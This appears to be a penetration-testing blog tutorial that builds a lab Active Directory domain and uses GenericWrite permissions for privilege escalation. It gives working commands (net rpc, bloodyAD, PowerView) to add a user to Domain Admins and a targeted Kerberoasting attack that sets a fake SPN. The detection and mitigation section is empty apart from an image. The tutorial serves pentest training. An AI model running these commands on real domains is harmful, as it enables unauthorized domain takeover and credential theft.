In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the GenericWrite permission in Active Directory environments. This permission can be exploited by attackers to update attributes such as group memberships, account permissions, or even execute privilege escalation by modifying login scripts or service principals.
The lab setup necessary to simulate these
attacks is outlined, with methods mapped to the MITRE ATT&CK framework to
clarify the associated techniques and tactics. Detection mechanisms for
identifying suspicious activities linked to GenericWrite attacks are also
covered, alongside actionable recommendations for mitigating these
vulnerabilities. This overview equips security professionals with critical
insights to recognize and defend against these prevalent threats.
Table of Contents
Abusing AD-DACL- GenericWrite
GenericWrite Permission
Prerequisites
Lab Setup – User Owns GenericWrite
Permission on the Domain Admin Group
Exploitation Phase I – User Owns
GenericWrite Permission on a Group
Bloodhound - Hunting for Weak Permission
Method for Exploitation – Account
Manipulation (T1098)
- Linux Net RPC – Samba
- Linux Bloody AD
- Windows Net command
- Windows PowerShell – Powerview
Lab Setup – User Owns GenericWrite
Permission on Another User
Exploitation Phase II – User Owns
GenericWrite Permission on Another User
Bloodhound - Hunting for Weak Permission
Method for Exploitation – Kerberoasting
(T1558.003)
- Linux Python Script – TargetedKerberoast
- Windows PowerShell – Powerview
Detection & Mitigation
GenericWrite Permission
The GenericWrite permission in
Active Directory allows a user to modify all writable attributes of an object,
excluding properties requiring special permissions like resetting passwords.
With GenericWrite over a user, you can
write to the "servicePrincipalNames" attribute and perform a targeted
kerberoasting attack.
With GenericWrite over a group, add
yourself or another principal you control to the group.
With GenericWrite over a computer, you can
write to the “msds-KeyCredentialLink” attribute. Writing to this property
allows an attacker to create “Shadow Credentials” on the object and
authenticate as the principal using Kerberos PKINIT.
Prerequisites
- Windows Server 2019 as Active Directory
- Kali Linux
- Tools: Bloodhound, Net RPC, Powerview, BloodyAD
- Windows 10/11 – As Client
Lab Setup – User Owns GenericWrite Permission on the Domain Admin Group
Create the AD Environment:
To simulate an Active Directory
environment, you will need a Windows Server as a Domain Controller (DC) and a
client machine (Windows or Linux) where you can run enumeration and
exploitation tools.
Domain Controller:
·
Install Windows Server (2016 or
2019 recommended).
·
Promote it to a Domain
Controller by adding the Active Directory Domain Services role.
·
Set up the domain (e.g., ignite.local).
User Accounts:
·
Create a standard user account
named Anuradha.
net user anuradha Password@1 /add
/domain
Assign the "GenericWrite"
Privilege to Anuradha:
Once your AD environment is set up, you
need to assign the "GenericWrite" privilege to Anuradha for
the Domain Admins group.
Steps:
·
Open Active Directory Users
and Computers (ADUC) on the Domain Controller.
·
Enable the Advanced Features
view by clicking on View > Advanced Features.
·
Locate the Domain Admins
group in the Users container.
Right-click on Domain Admins and go
to Properties.
Go to the Security tab, and
click on Add button
In the “Enter the object name to select”
box, type Anuradha and click Check Names and click
on OK.
In the Permissions section, check
the box for Write permission.
Selecting the Write checkbox
automatically enables the "Add/remove self as member" checkbox
and Apply the settings.
At this point, Anuradha now
has GenericWrite and AddSelf rights over the Domain
Admins group, meaning they can add themselves or another principal
they control to the group.
Exploitation Phase I – User Owns GenericWrite Permission on a Group
Bloodhound - Hunting for Weak Permission
Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Anuradha has
the GenericWrite permission on the Domain Admins group.
bloodhound-python -u anuradha -p
Password@1 -ns 192.168.1.7 -d ignite.local -c All
From the graphical representation of
Bloodhound, the tester would like to identify the outbound object control for
selected user where the first degree of object control value is equal to 1.
Thus, it has shown the Anuradha User has
GenericWrite and SelfAdd privilege to Domain Admin group.
Method for Exploitation – Account Manipulation (T1098)
Linux Net RPC – Samba
The tester can abuse this permission by adding
Anuradha User into Domain Admin group and list the domain admin members to
ensure that Anuradha Users becomes Domain Admin.
net rpc group addmem "Domain
Admins" anuradha -U ignite.local/anuradha%'Password@1' -S 192.168.1.7
Bloody AD
Alternatively, it can be achieved
using bloodyAD
bloodyAD --host "192.168.1.7"
-d "ignite.local" -u "anuradha" -p "Password@1" add
groupMember "Domain Admins" "anuradha"
Windows Net command
This can be achieved with a native command
line, using windows net command.
net group "domain admins"
anuradha /add /domain
thus, from user property we can see Anuradha
user has become the member of domain admin.
Windows PowerShell - Powerview
The attacker can add a user/group/computer
to a group. This can be achieved with with the Active Directory PowerShell
module, or with Add-DomainGroupMember (PowerView module).
powershell -ep bypass
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString
'Password@1' -AsPlainText -Force
$Cred = New-Object
System.Management.Automation.PSCredential('ignite.local\anuradha',
$SecPassword)
Add-DomainGroupMember -Identity 'Domain
Admins' -Members 'anuradha' -Credential $Cred
Lab Setup – User Owns GenericWrite Permission on Another User
Here, in this lab setup, we will create two
users’ Krishna and Radha, where the user Radha has GenericWrite permission over
the Krishna user.
Create the AD Environment and User
accounts
·
Create two AD user accounts
named Krishna and Radha.
net user krishna Password@1 /add /domain
net user radha Password@1 /add /domain
Assign the "GenericWrite"
Privilege:
·
Open Active Directory Users
and Computers (ADUC) on the Domain Controller.
·
Enable the Advanced Features
view by clicking on View > Advanced Features.
·
Locate User Krishna in
the Users container.
·
Right-click on Krishna User
and go to Properties.
1.
Go to the Security tab,
and click on Add button
2.
In the “Enter the object name
to select” box, type Radha and click Check Names and
click on OK.
3.
Select Radha user and in
the Permissions section, check the box for Write
permission.
4.
Apply the settings.
At this point, Radha now
has GenericWrite permission for Krishna user.
Exploitation Phase II – User Owns GenericWrite Permission on Another User
Bloodhound - Hunting for Weak Permission
Hunting for First-Degree Object Control for
the Radha user, as demonstrated in the previous steps.
bloodhound-python -u anuradha -p
Password@1 -ns 192.168.1.7 -d ignite.local -c All
From the graph it can be observed that the Radha
user owns GenericWrite privilege on Krishna user.
Method for Exploitation – Kerberoasting (T1558.003)
This abuse can be carried out when
controlling an object that has a GenericAll,
GenericWrite, WriteProperty or Validated-SPN over the
target.
TargetedKerberoast
From UNIX-like systems, this can be done
with targetedKerberoast.py (Python).
Further, with the help of John the Ripper
end the dictionary such as Rock You can help the attacker to brute force the
weak password.
./targetedKerberoast.py --dc-ip
'192.168.1.7' -v -d 'ignite.local' -u 'radha' -p 'Password@1'
Windows PowerShell - Powerview
From Windows machines, this can be achieved
with Set-DomainObject and Get-DomainSPNTicket (PowerView
module).
powershell -ep bypass
Import-Module .\PowerView.ps1
Set-DomainObject -Identity 'krishna'
-Set @{serviceprincipalname='nonexistent/hacking'}
Get-DomainUser 'krishna' | Select
serviceprincipalname
$User = Get-DomainUser 'krishna'
$User | Get-DomainSPNTicket
Detection & Mitigation
.png)
0 comments:
Post a Comment